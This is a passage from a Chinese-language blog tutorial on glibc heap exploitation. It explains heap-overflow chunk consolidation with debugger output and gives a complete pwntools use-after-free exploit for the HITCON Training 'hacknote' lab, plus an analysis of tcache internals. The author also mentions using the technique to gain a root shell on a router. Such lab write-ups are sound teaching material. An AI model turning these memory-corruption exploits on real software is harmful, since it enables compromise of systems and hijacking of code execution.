*data = &quot;15935728\x00&quot;;</span><br><span class="line">    memcpy(ptr5, data, 0x9);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Chunk 5 @ %p\t Contains: %s\n\n&quot;, ptr5, (char *)ptr5);</span><br><span class="line"></span><br><span class="line">    printf(&quot;Just like that we use a heap overflow to cause a heap consolidation past an allocated chunk, get overlapping pointers, and edit a free chunk!\n&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>我们先看看b1-b6几处的堆的情况。<br>在b1处下断点，目的是观察在free之前各个chunk的地址<br><img src="/images/heap_exp/2021-05-18-17-27-26.png" alt>  </p>
<p>在b2处下断点，我们得到heap bin的情况如下图<br><img src="/images/heap_exp/2021-05-18-17-28-36.png" alt><br>可以看出ptr0指向的chunk是被回收到了unsorted中，因为这个chunk已经超过tcache所能容纳的0x400的大小了，是直接由unsorted bin回收。<br>同时我们可以看下ptr2指向的chunk的metadata部分<br><img src="/images/heap_exp/2021-05-18-17-32-11.png" alt><br>如图所示，ptr2指向的chunk显示当前大小为0x510，而前一个紧邻的chunk的标志位为在使用</p>
<p>在b3处下断点，再看ptr2指向的chunk的大小<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Chunk(addr=0x555555758c00, size=0x510, flags=)</span><br><span class="line">    [0x0000555555758c00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]</span><br></pre></td></tr></table></figure></p>
<p>可以看出prev_inuse标志位已经被置空，而且标志前一个chunk的大小的数据为<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x/g 0x555555758c00-8-8</span><br><span class="line">0x555555758bf0:	0x590</span><br></pre></td></tr></table></figure></p>
<p>因此<code>ptr1[14] = 0x590;ptr1[15] = 0x510;</code>已经成功溢出，并且覆盖了ptr2块的元数据，修改了prev_chunk_size和current_chunk_size以及prev_inuse标志位。这就会导致当free ptr2的chunk的时候，根据glibc的源代码，free的时候会进行向前和向后的合并，如果前面那个chunk或者后面紧邻的chunk都是未使用的话，则会把他们融合为一个大的chunk放到unsorted bin上。</p>
<p>在b4处下断点，看下是否如我们所愿，有一个ptr2 大小的chunk和一个0x590相加之后的chunk被放到了unsorted bin上了。<br><img src="/images/heap_exp/2021-05-18-17-44-15.png" alt><br>如我们所愿，一个0x510 + 0x590 = 0xaa0大小的chunk被放置到了unsorted bin上了，所以实际上ptr1虽然没有被释放，已经被回收到了unsorted bin中了</p>
<p>在b5处下断点，观察新分配的ptr4，和ptr5的来源是哪里<br><img src="/images/heap_exp/2021-05-18-17-58-45.png" alt><br><img src="/images/heap_exp/2021-05-18-17-59-23.png" alt><br>由图我们可知unsorted bin会被分割成合适大小的chunk分别返回给0x500和0x70的两个chunk。<br>ptr5指向的实际上与ptr1指向的是同一个地址，就是由于溢出导致错误的将ptr1收回到了unsorted bin中了。</p>
<p>在b6处下断点，观察ptr1回收到了什么地方<br><img src="/images/heap_exp/2021-05-18-17-56-06.png" alt><br>由于ptr1是0x80大小的chunk，因此还是在tcache的0x20~0x410的大小范围内的。</p>
<p>最后的打印输出也显示ptr5与ptr1是指向的相同的地方的，而此时ptr1已经是被会回收到了tcache中了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Chunk 1: 0x555555758b80	 Size: 0x70</span><br><span class="line"></span><br><span class="line">Chunk 5 @ 0x555555758b80	 Contains: 15935728</span><br></pre></td></tr></table></figure></p>
<p>这种攻击的方法主要是通过溢出，导致紧邻的chunk的头部被修改，包括标志位，以及前一个chunk的大小的修改，使得紧邻的chunk被free的时候能够造成错误的把一个chunk 回收，这样在后续的malloc中就可以直接修改这个错误回收的chunk的数据。这是一种比较常用的攻击手法，笔者在路由器的漏洞挖掘中曾经实用过这种攻击方法，并且成功拿到了root shell。</p>
<h2 id="UAF漏洞"><a href="#UAF漏洞" class="headerlink" title="UAF漏洞"></a>UAF漏洞</h2><p>UAF就是在释放之后仍然实用chunk，这个天然就是可以修改已经free的chunk。<br>实例采用一个经典的UAF练习<a href="https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab10/hacknote.c" target="_blank" rel="noopener">hitcon training</a><br>利用代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># coding=utf-8</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &quot;debug&quot;</span><br><span class="line"></span><br><span class="line">p = process(&apos;./hacknote&apos;)</span><br><span class="line">elf = ELF(&apos;./hacknote&apos;)</span><br><span class="line"></span><br><span class="line">magic = 0x08048986</span><br><span class="line"></span><br><span class="line">def create(size,content):</span><br><span class="line">    p.recvuntil(&quot;:&quot;)</span><br><span class="line">    p.sendline(str(1))</span><br><span class="line">    p.recvuntil(&quot;:&quot;)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line">    p.recvuntil(&quot;:&quot;)</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line">def delete(idx):</span><br><span class="line">    p.recvuntil(&quot;:&quot;)</span><br><span class="line">    p.send(str(2))</span><br><span class="line">    p.recvuntil(&quot;:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">def print_note(idx):</span><br><span class="line">    p.recvuntil(&quot;:&quot;)</span><br><span class="line">    p.sendline(str(3))</span><br><span class="line">    p.recvuntil(&quot;:&quot;)</span><br><span class="line">    p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">create(16,&apos;aa&apos;)</span><br><span class="line">create(16,&apos;bb&apos;)</span><br><span class="line">delete(0)</span><br><span class="line">delete(1)</span><br><span class="line">create(8,p32(magic))</span><br><span class="line">print_note(0)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<p>第一次调用malloc，生成一个struct note的结构，申请的是0x8大小的内存，实际上的chunk是0x8  + 0x8 = 0x10大小的chunk，malloc的返回地址是0x0804b1a0。<br>输入size为16，第二次调用malloc，为content生成内存空间，chunk大小为0x10 +0x8=0x18，返回地址为 0x0804b1b0。<br>不知为何heap chunks在这个地方是什么都不显示。只能依靠原始的方法在malloc处打断点，得到返回的地址。</p>
<p>第二次add node，第二次创建struct note, 堆地址为0x0804b1d0, content地址为0x0804b1e0 </p>
<p>第一次delte 第一个node，tcache的结果<br><img src="/images/heap_exp/2021-05-19-14-46-03.png" alt><br>这个感觉不太对，所以感觉在32位的时候貌似GEF的heap指令显示的结果都有点问题，自己尝试确定tcache真实的状态。<br>根据我的理解，tcache与fastbin类似，都是一个数组指针在维护，那么tcache的数组中必有一个指针是指向刚刚释放的note的，他的有效载荷的地址是0x0804b1a0，我们先通过search-pattern去搜索一下这个地址，看看能不能在libc的空间中找到记载这个地址的内存，如果有那么大概率就是tcache数组的地址，<br><img src="/images/heap_exp/2021-05-19-14-53-13.png" alt><br>后来并没有发现在libc的内存空间中有这个,只是在hacknote和heap中有这个，通过源码我们知道，必定有一个静态变量存储着tcache<br>再次对比源码我发现起始fastbin数组和tcache数组还是有着很大的区别的<br>fastbin数组的元素是chunk header的指针，也就是说这个数组中确实保存着指向堆区地址的指针，而<code>tcache_entry *entries[TCACHE_MAX_BINS];</code>这个数组的元素是指向tcache_entry的，而这个东西并不是malloc_chunk数据结构，它是在什么地方生成的，还不确定。<br>经过分析源码发现<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">static __always_inline void</span><br><span class="line">tcache_put (mchunkptr chunk, size_t tc_idx)</span><br><span class="line">&#123;</span><br><span class="line">  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);</span><br><span class="line"></span><br><span class="line">  /* Mark this chunk as &quot;in the tcache&quot; so the test in _int_free will</span><br><span class="line">     detect a double free.  */</span><br><span class="line">  e-&gt;key = tcache;</span><br><span class="line"></span><br><span class="line">  e-&gt;next = PROTECT_PTR (&amp;e-&gt;next, tcache-&gt;entries[tc_idx]);</span><br><span class="line">  tcache-&gt;entries[tc_idx] = e;</span><br><span class="line">  ++(tcache-&gt;counts[tc_idx]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>实际上就是将tcache_entry 实际上就是指向的chunk中有效负载的地址的。<br>向tcache中添加一个chunk的流程，当释放一个chunk的时候，首先得到他的有效负载的地址，将他赋值给一个tcache_entry指针e<br>e-&gt;key = tcache实际上就是chunk中的bk指针指向了tcache</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">typedef struct tcache_entry</span><br><span class="line">&#123;</span><br><span class="line">  struct tcache_entry *next;</span><br><span class="line">  /* This field exists to detect double frees.  */</span><br><span class="line">  struct tcache_perthread_struct *key;</span><br><span class="line">&#125; tcache_entry;</span><br></pre></td></tr></table></figure>
<p>而<code>e-&gt;next = PROTECT_PTR (&amp;e-&gt;next, tcache-&gt;entries[tc_idx]);</code>的意义是让chunk的fd指针指向了某个地址，至于这个地址是什么我觉着应该是之前已经在这个tcache链表上的一个chunk的地址。这个需要我们分析<code>PROTECT_PTR (&amp;e-&gt;next, tcache-&gt;entries[tc_idx]);</code>到底干了什么，因为要插入到tcache，所以肯定有tcache中将数组中的元素指向了这个e，而这个e的值就是chunk中有效负载的地址，所以我们之前分析的不错，应该在libc中有一个地址指向0x0804b1a0。但是实际上并没有，所以还是有个地方出错了。</p>
<p>后来经过分析发现，tcache这个只不过是一个指针，它指向的内容并不一定是在全局变量区的，而有可能是堆上分配的，经过跟踪源码发现tcache的生成过程是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">tcache = (tcache_perthread_struct *) victim;</span><br><span class="line"></span><br><span class="line">victim = _int_malloc (ar_ptr, bytes);</span><br><span class="line"></span><br><span class="line">_int_malloc&#123; p = sysmalloc (nb, av); return p;&#125;</span><br></pre></td></tr></table></figure></p>
<p><img src="/images/heap_exp/2021-05-24-12-22-24.png" alt><br>所以可以判断出来与fastbin数组不同的是，tcache是在堆上存储的数据结构，而各种bin则是在libc库的数据区存储的数据结构。所以我们通过search-pattern搜索到的就是tcache的位置，<code>0x804b090</code>这个应该就是0x10 chunk 所对应的元素地址。</p>
<p>还有一个不同就是tcache数组中存储的是指向有效负载地址的指针，而不是chunk的头部，而本来是fd，现在叫next的位置也是直接指向下一个有效负载的位置</p>
<p>如果我们理解正确的话，那么与<code>0x804b090</code>紧邻的地方存储的应该就是指向0x18chunk的有效负载的地址，就是我们content的地址 <code>0x0804b1b0</code>,验证试试。<br><img src="/images/heap_exp/2021-05-19-15-35-50.png" alt><br>我们发现果然是正确的，所以tcache的大致工作原理我用下面的这张图总结<br><img src="/images/heap_exp/2021-05-19-15-41-25.png" alt><br>注意tcache数组中的元素总是指向最新添加到tcache中的chunk的。当我们再次delete note的时候，可以继续观察0x804b090的指向，如果我们理解正确的话，这个地方应该是指向第二个note的地址0x0804b1d0， 0x804b094中存储的应该是第二个content地址0x0804b1e0。<br><img src="/images/heap_exp/2021-05-19-15-45-18.png" alt><br>而0x0804b1d0这个地址应该存储的是第一个note的地址，这样才能连接起来<br><img src="/images/heap_exp/2021-05-19-15-47-18.png" alt></p>
<p>当理解了整个heap的变化过程，我们很快就可以理解这个UAF exp的原理。</p>
<ol>
<li>首先创建两个note然后在删除两个note得到四个在tcache上的chunk,其中有两个chunk在0x10，另外连个在0x18</li>
<li>再创一个note，并且让content大小为8，这样就把两个chunk 0x10大小的给重新利用上了，这个新创建的note的content实际上就是第一个note</li>
<li>通过给这个content赋值，就可以修改第一个note的<code>void (*printnote)();</code>函数指针</li>
</ol>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><a href="https://www.jianshu.com/p/f894c2961ca6" target="_blank" rel="noopener">https://www.jianshu.com/p/f894c2961ca6</a></li>
<li><a href="https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab10/hacknote.c" target="_blank" rel="noopener">https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab10/hacknote.c</a></li>
<li><a href="http://p4nda.top/2018/03/20/tcache/" target="_blank" rel="noopener">http://p4nda.top/2018/03/20/tcache/</a></li>
<li><a href="https://guyinatuxedo.github.io/27-edit_free_chunk/heap_consolidation_explanation/index.html" target="_blank" rel="noopener">https://guyinatuxedo.github.io/27-edit_free_chunk/heap_consolidation_explanation/index.html</a></li>
</ol>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%86%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text">堆漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">2.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Double-Free%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.</span> <span class="toc-text">Double Free漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A0%86%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.</span> <span class="toc-text">堆溢出漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#UAF%E6%BC%8F%E6%B4%9E"><span class="toc-number">5.</span> <span class="toc-text">UAF漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">6.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&text=堆利用系列二：堆漏洞"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&is_video=false&description=堆利用系列二：堆漏洞"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=堆利用系列二：堆漏洞&body=Check out this article: https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&title=堆利用系列二：堆漏洞"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&name=堆利用系列二：堆漏洞&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E4%B9%8B%C2%96%E5%A0%86%E6%BC%8F%E6%B4%9E/&t=堆利用系列二：堆漏洞"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2021
    Colorlight
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
